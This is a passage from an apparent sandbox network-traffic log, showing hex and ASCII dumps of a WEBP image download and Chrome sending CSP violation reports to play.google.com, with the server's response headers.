                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC856INData Raw: 52 49 46 46 6e 2e 00 00 57 45 42 50 56 50 38 20 62 2e 00 00 b0 9e 00 9d 01 2a a6 00 28 01 3e 61 28 90 45 24 22 a1 97 1b 2e 4c 40 06 04 b5 04 38 00 f8 00 cd 77 35 ff 1b f8 e5 dc 61 d9 3c 3f e4 6f b4 af 20 f6 27 eb 2f ba 7e a7 fe db f3 c5 fb 9e e5 3e 5b c8 9b 9c bf e3 7f 88 fe ed fb 25 f3 33 fd 17 fc 4f 66 5f a2 bf ea 7b 81 fe a5 ff bb fe df f9 01 dd 67 f7 4b d4 57 f4 af ee 9f fa 7f c9 7b c5 7f d0 fd c0 f7 59 fd fb d4 03 fa d7 fb 2f ff fe d5 3f ef ff ff fb 98 ff 77 ff 7b ff d3 dc 03 f9 97 fb 2f 4d af dc cf 84 8f ed ff f1 7f 71 3e 06 7f 67 ff f9 fb 00 7f f4 f5 00 e9 f7 eb df f6 5f 46 fe 18 fe 37 f2 8f ce df 2a 5e f1 fd eb f6 eb d8 ff 21 7c 61 fa 11 fc e3 f0 b7 e9 3f c2 fe e3 fb 5d ff 13 c4 bf 9c bf eb fa 85 fe 5b fc e3 fd 1f e6 b7 f7 7f 8e df be ee 67 b8 5f
                                                                                                                                                                                                                                  Data Ascii: RIFFn.WEBPVP8 b.*(>a(E$".L@8w5a<?o '/~>[%3Of_{gKW{Y/?w{/Mq>g_F7*^!|a?][g_
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: a1 7f 7c cf 63 f1 17 a5 2c ae 95 ab e2 c5 d1 d4 e2 3e db 7f 63 93 d4 8b d8 77 c8 43 08 e4 ca 79 c1 39 26 c1 2f dd 22 f9 eb 5c 30 3d 71 5e 58 3f 73 4e 60 23 e3 d9 fc 58 d4 87 9d c3 16 a8 eb c5 15 9d 47 09 80 d2 d7 a4 9b 80 ec 3e 6b f4 39 93 1d b3 eb 0e be c3 94 a9 40 f5 3c 86 3b f6 34 ca 72 24 52 b3 31 5b 9e 26 13 9c 7e 62 8e 39 2e 94 41 b0 eb c1 7f 7a a7 2d f1 dc a6 c0 40 94 fe 69 03 ca d9 25 fc 6f 91 27 60 86 8d 66 3b e0 b7 ce 67 14 1c 3b eb 8b eb eb 0e 1a ef ad b1 9f 80 71 73 3f 88 83 ae 00 54 6b c4 b4 a1 5b 53 27 24 d9 c9 5b 28 d6 9d 67 e7 84 b4 8c 4f e1 96 67 c2 bf 93 0f c8 0c 7f d3 d9 28 1a 24 60 09 4b a0 c6 e8 af 33 a5 87 5b be ac 48 a7 b5 11 c5 97 c3 d6 d7 33 3f da db bf ae cb de 7b 0d c5 f9 90 9e 85 64 17 53 ef 8a af fd 87 75 b0 5b 0e c4 1b 6e 5e
                                                                                                                                                                                                                                  Data Ascii: |c,>cwCy9&/"\0=q^X?sN`#XG>k9@<;4r$R1[&~b9.Az-@i%o'`f;g;qs?Tk[S'$[(gOg($`K3[H3?{dSu[n^
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: b5 54 4a 66 f8 01 79 35 79 c4 bc 82 80 28 c2 92 11 cf 0a 76 49 d6 0d 30 44 9e 59 9f ec fa ec c5 7a a6 48 bb aa 09 2f 8e e7 e2 32 9e 9a 2c 10 45 fd 35 f2 55 89 93 0f 0c fe 85 71 0a 0f 83 1a c3 e9 76 b0 67 63 6d ac 3a 4f ad 6e 2b 63 04 11 6f 96 96 3e 9e 28 16 60 4d 4f 76 c6 89 64 05 6f 03 d7 d2 92 d8 60 82 81 f8 ce 55 de f0 79 2c 62 20 84 9f 61 90 78 d0 d6 3e c3 42 99 f2 cf 06 72 80 0b 1a c4 29 ab 3b ee 39 6a 2f ae 5a 89 dc 6e 61 ef af f1 5d 47 75 51 73 e6 1e a5 ea 77 d6 66 5b ca 36 82 bf 9c 3f f1 9e e6 1a 88 f0 ab 32 08 6c 44 5e 23 b7 e4 7b 2b 98 0f 11 ea 62 ee 56 62 44 43 19 61 f5 52 58 1e 6a a6 0f 77 25 94 4f de 9d 00 7e 33 7e 9e 71 3b 49 88 59 c4 a2 ab 4e 13 16 a6 9b 55 b2 34 bb c5 c7 4f 24 ca 79 a2 90 c5 6a 57 e0 07 e8 fe 4c 78 21 52 10 fd 1e f7 b8 d1
                                                                                                                                                                                                                                  Data Ascii: TJfy5y(vI0DYzH/2,E5Uqvgcm:On+co>(`MOvdo`Uy,b ax>Br);9j/Zna]GuQswf[6?2lD^#{+bVbDCaRXjw%O~3~q;IYNU4O$yjWLx!R
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 54 52 ea 62 1a 46 87 45 ad 03 88 02 1e b5 fd 37 b5 53 43 9b 87 d4 00 36 89 0c 14 a3 bc b3 bd 5a 6b 5e 31 58 a2 c5 c1 f7 03 a3 ff f2 28 65 c3 b1 e3 34 29 b0 33 b9 f1 15 f7 dc 36 dd ba 91 b4 f2 44 05 73 79 af 43 b7 81 b0 5e 38 30 73 a1 35 44 f3 2c c5 ad 9b 0e ce af 66 99 7c f6 01 40 44 44 d5 8b ae 71 17 6f 83 8d bf 0b 34 9b 05 db 0c 58 e1 86 4e dd ca 80 5f f3 9b 50 db d4 c9 0d 8c 02 0a 9d 55 49 54 82 c5 66 c4 e6 87 1a b5 78 07 a5 21 f6 e7 40 ab 6d ff e5 41 af 98 81 cd bf 10 b4 10 e1 ec 7b 8d f0 09 0f 48 c2 c0 2f 2d 4e b2 4e 85 63 e3 f8 c2 e0 10 64 17 f1 2c ff 01 43 90 d5 f2 3d 4f d2 df a7 9a 0c 7a 1e 8b 8a 89 94 a9 e8 cb 68 f2 5b 66 18 dd ee 70 cb fc 1b c4 b0 63 11 74 a1 f7 29 b8 63 df 0c 41 24 e6 27 46 17 ec 56 1f 5a 3b 01 4b 1c 4a e6 d5 60 bc 6b 2e ac 48
                                                                                                                                                                                                                                  Data Ascii: TRbFE7SC6Zk^1X(e4)36DsyC^80s5D,f|@DDqo4XN_PUITfx!@mA{H/-NNcd,C=Ozh[fpct)cA$'FVZ;KJ`k.H
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 98 f4 49 d7 0c ce fa e0 41 ba f4 12 bf 58 7a 87 85 73 9f 77 63 28 e7 84 16 b3 c5 02 b7 4f 88 ce e2 c0 7e b2 f7 9d e3 27 0a f6 49 99 c5 2d f4 43 d6 d5 84 b7 45 fe 11 0c 24 1d e0 63 f2 db a5 78 c9 44 e3 85 76 ab 79 b8 3a ac cc f6 2f 50 9c 22 b0 24 1b 0c a5 61 20 03 13 20 45 ee a3 b8 6b f4 cf df 00 9c 82 6b 87 3d ae 80 b5 52 b7 b0 1f d8 78 35 57 b8 2a c3 b4 95 bb de 7c 8c 01 ed cb 82 66 2e a9 02 14 ff 13 8c d3 98 be 23 88 4d e0 13 28 14 8e c7 bc dd be be 79 e4 30 56 04 f1 5c 1f a8 71 e3 06 7a cf e3 a9 f8 cc 7a a2 81 dd 05 25 fd cf c5 7e ce a8 6c 6e 5b 1e ae 84 29 00 29 ff 98 24 25 89 0c 73 7e 97 a8 b8 7e ba 5d 6f 46 d6 a7 91 b8 3c 0d 8d e8 9a 48 0c b4 10 d5 a0 d9 d8 3b 34 e1 f2 40 d9 93 ee 66 ef 93 40 09 af 52 fb dd 15 86 df 09 11 ad 57 c6 c6 7c 72 07 ce 18
                                                                                                                                                                                                                                  Data Ascii: IAXzswc(O~'I-CE$cxDvy:/P"$a Ekk=Rx5W*|f.#M(y0V\qzz%~ln[))$%s~~]oF<H;4@f@RW|r
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 08 83 40 8a a6 74 09 2d 3c 89 eb 1b ae 50 98 c8 c7 3c fa ce 2f 2f 2c 65 48 c5 d1 a0 a6 d4 88 2e db ba 2c 1d ec a5 95 f7 11 e1 82 bd c8 94 1a 75 90 77 50 5c f8 20 04 a0 01 55 d0 bc 6e 65 18 92 03 7e 39 60 9b 47 61 bc 02 22 ff 33 c8 da 71 b1 e0 e0 bb a1 82 fd de 75 43 b4 ab 1c 93 2d fc c0 09 76 49 19 76 c9 1a 3f f7 e9 fe cd e2 99 a8 e8 5a 54 a8 57 55 cc 17 46 14 75 a0 d5 5e 69 e5 3e 82 b0 c9 bc 0f 11 41 93 be f3 f0 4c 6d d0 6d 47 e0 88 2c 2f c0 8e ad f7 e0 83 cf 1f 62 37 b1 dd 50 47 2b a5 81 dc 60 25 3b 07 e7 58 6c a8 07 b7 8e 56 fa c6 02 f2 df e7 7d b9 5b 5c 9b 44 99 b3 a3 47 09 ce 77 ad e7 61 28 b3 d4 ea fc db ea 10 63 90 32 3e 9e 52 e2 80 73 bc d3 dc b1 37 0e ed 8a f7 2c f0 d5 a9 f5 16 83 d8 da 22 3c 7b 59 be 41 be 8a 11 58 30 64 ed 4d 8c 96 d9 c9 64 b9
                                                                                                                                                                                                                                  Data Ascii: @t-<P<//,eH.,uwP\ Une~9`Ga"3quC-vIv?ZTWUFu^i>ALmmG,/b7PG+`%;XlV}[\DGwa(c2>Rs7,"<{YAX0dMd
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 16 04 c2 55 98 29 7c 2c 8d 45 7a 81 99 9f ac b9 ca 48 42 80 54 99 07 ef 85 03 f7 d1 fb 4e 0e 6f 28 ee 23 68 2b b3 d7 ef 76 e7 05 69 2f eb 5d 59 82 4e 71 2a 97 c2 70 1d f3 53 8e bf 0c ea e2 d3 38 e6 9f df dc e5 c0 22 f1 d0 af 01 dc e9 03 bf fc 38 72 51 4f a0 e6 33 24 57 13 af bd 86 52 6c 7e 5d cf b6 1b 23 35 b2 62 9a e3 bb 9b fc ab 36 47 9f 4b 2f 00 80 ec 4b 45 59 e1 24 18 a2 33 37 5a d0 60 b2 c2 5c 26 88 d8 83 24 ed 32 a4 ae 2e 17 a6 84 07 d6 c1 24 0d 0f fd 8a 3d 44 10 27 71 c2 78 74 bc 9c f4 bf d6 99 b7 33 43 81 db 5c 5f 15 af 36 78 da ff a1 20 16 57 4c 5a 13 86 ed 37 bc 04 c5 85 d4 5e ca a4 58 0c ea c5 ab f5 70 5b 83 aa e4 bd e4 54 e2 ac 35 70 dc 36 b6 ed 00 9a 04 35 27 65 b8 f5 4f bc b2 b4 09 80 4b 9e a4 9d ad 69 36 f0 61 b8 98 50 97 58 68 76 7e b9 9d
                                                                                                                                                                                                                                  Data Ascii: U)|,EzHBTNo(#h+vi/]YNq*pS8"8rQO3$WRl~]#5b6GK/KEY$37Z`\&$2.$=D'qxt3C\_6x WLZ7^Xp[T5p65'eOKi6aPXhv~
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: ff 7c 3c 91 a9 55 b3 15 cf 30 19 d1 fe 9b ad f1 2c 8b ab 2f 21 a9 0f 4f d3 46 4e a9 5f 7f 6f 9e 8f c7 32 23 d7 33 3c 0f 37 fc 3c 20 46 55 b4 86 ac 1f ed 13 d0 a7 86 3f 1a a9 e0 98 dc aa 03 d2 ac 4e ef a2 bb a0 98 f9 2d cb 23 36 74 4a 81 56 81 2b 40 60 3f f9 c3 d7 8c 3c 25 8d 4d da 07 b1 ec 07 fa e1 97 29 c1 a6 33 89 5f 7f 91 56 b9 82 44 92 53 d0 62 a0 5c 43 b0 1c d0 9a 98 5a f0 41 ca 58 77 76 7a a9 16 f3 2b c7 be 21 b0 9d 79 ad a0 a7 86 0d 7c 77 54 fb 31 33 61 06 4e cd 0f e4 37 75 bd 7f ba 64 c6 b0 17 bf ea e6 ed 32 22 c6 22 ab 29 69 70 3f 4f 47 2b 67 65 40 a6 96 52 0d b7 8c be e7 7e 77 fb e1 df ea b0 f5 80 5e f9 61 e7 34 48 e8 62 bf 67 b8 8b 56 97 61 d4 d5 09 b3 6f 0a 46 c4 db a7 8c 1b 23 23 11 15 d0 b6 b4 f9 54 9a 47 47 35 f1 6a be 23 96 b9 81 1a d6 9e
                                                                                                                                                                                                                                  Data Ascii: |<U0,/!OFN_o2#3<7< FU?N-#6tJV+@`?<%M)3_VDSb\CZAXwvz+!y|wT13aN7ud2"")ip?OG+ge@R~w^a4HbgVaoF##TGG5j#
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1308INData Raw: c0 d8 fe 7f e0 90 fe 6a 47 f5 9f ed 87 f9 0e de 85 5e cf 8a 35 44 c3 11 0d af 9d 76 3a 4f d8 25 6a 3c 72 8a 03 2b 01 91 7f 3e 3e b8 77 4a 45 16 5e 42 b2 93 03 2f 0e 51 5a 89 1a 06 78 9d 15 27 c8 f1 65 4a 5c 10 3f 92 e2 80 fd de 58 e4 07 8f a5 ab d8 b9 2e cf b4 bd 25 8f ee b9 da 1b 6c ac d8 1f 18 1c 32 c8 cd 2e bd f3 bb 6e a4 03 cf da f4 68 ed 30 9a b3 4c c5 ce f4 6d 24 93 4a 8c 14 c5 48 9f 49 e5 ab b4 e8 a9 ab e8 99 57 6c 4d b5 a5 b6 2d d7 b3 5f b1 61 6c 55 1f 39 cf 8e a9 28 a3 35 c4 e4 03 a4 a8 6f 6a 3f b9 b5 67 05 7c 2e 68 4c 3c 4e a7 ea 47 6b 89 a9 5e e0 61 62 d1 5e 46 93 28 eb c8 ec 8d 84 e8 23 2c e5 0f 2a 42 28 f6 dd 67 7d f3 29 4b 6b 72 5a e8 65 87 df fa 36 52 f0 71 72 a4 35 d0 9b 86 c5 fd b6 0d 22 4d 05 3d ea ae ec 7e 32 5f c6 6e 08 ff c4 49 c8 49
                                                                                                                                                                                                                                  Data Ascii: jG^5Dv:O%j<r+>>wJE^B/QZx'eJ\?X.%l2.nh0Lm$JHIWlM-_alU9(5oj?g|.hL<NGk^ab^F(#,*B(g})KkrZe6Rqr5"M=~2_nII


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  134192.168.2.649932142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1269OUTPOST /_/PlayStoreUi/cspreport/fine-allowlist HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 2766
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  Content-Type: application/csp-report
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: report
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC2766OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 73 65 61 72 63 68 3f 71 3d 69 6e 73 74 61 67 72 61 6d 26 63 3d 61 70 70 73 26 68 6c 3d 72 75 26 67 6c 3d 55 53 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 73 63 72 69 70 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c
                                                                                                                                                                                                                                  Data Ascii: {"csp-report":{"document-uri":"https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US","referrer":"","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"script-src 'unsafe-inline' 'unsafe-eval' bl
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC3301INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:49 GMT
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-_VJu0eBN1pmnMDnBUT0Flw' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/PlayStoreUi/cspreport;worker-src 'self'
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://market.android.com https://clients2.google.com https://payments.sandbox.google.com https://payments.google.com https://maps.googleapis.com https://translate.googleapis.com https://translate.google.com https://support.google.com https://www.gstatic.cn https://families.google.com https://clients1.google.com https://myaccount.google.com https://accounts.google.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.googleapis.com/appsmarket/v2/installedApps/;report-uri /_/PlayStoreUi/cspreport/allowlist
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.googletagmanager.com/gtag/js https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/destination https://www.gstatic.com/_/mss/boq-one-google/_/ https://www.gstatic.com/og/_/js/ https://apis.google.com/js/api.js https://apis.google.com/js/client.js https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/ https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/ https://www.google.com/js/bg/ https://www.gstatic.com/_/boq-play/_/js/k=boq [TRUNCATED]
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  135192.168.2.650003142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC1269OUTPOST /_/PlayStoreUi/cspreport/fine-allowlist HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 2817
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  Content-Type: application/csp-report
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: report
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC2817OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 73 65 61 72 63 68 3f 71 3d 69 6e 73 74 61 67 72 61 6d 26 63 3d 61 70 70 73 26 68 6c 3d 72 75 26 67 6c 3d 55 53 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 73 63 72 69 70 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c
                                                                                                                                                                                                                                  Data Ascii: {"csp-report":{"document-uri":"https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US","referrer":"","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"script-src 'unsafe-inline' 'unsafe-eval' bl
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC3301INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:50 GMT
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-w0QVebP2zEOdI_grO6NdJg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/PlayStoreUi/cspreport;worker-src 'self'
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://market.android.com https://clients2.google.com https://payments.sandbox.google.com https://payments.google.com https://maps.googleapis.com https://translate.googleapis.com https://translate.google.com https://support.google.com https://www.gstatic.cn https://families.google.com https://clients1.google.com https://myaccount.google.com https://accounts.google.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.googleapis.com/appsmarket/v2/installedApps/;report-uri /_/PlayStoreUi/cspreport/allowlist
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.googletagmanager.com/gtag/js https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/destination https://www.gstatic.com/_/mss/boq-one-google/_/ https://www.gstatic.com/og/_/js/ https://apis.google.com/js/api.js https://apis.google.com/js/client.js https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/ https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/ https://www.google.com/js/bg/ https://www.gstatic.com/_/boq-play/_/js/k=boq [TRUNCATED]
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
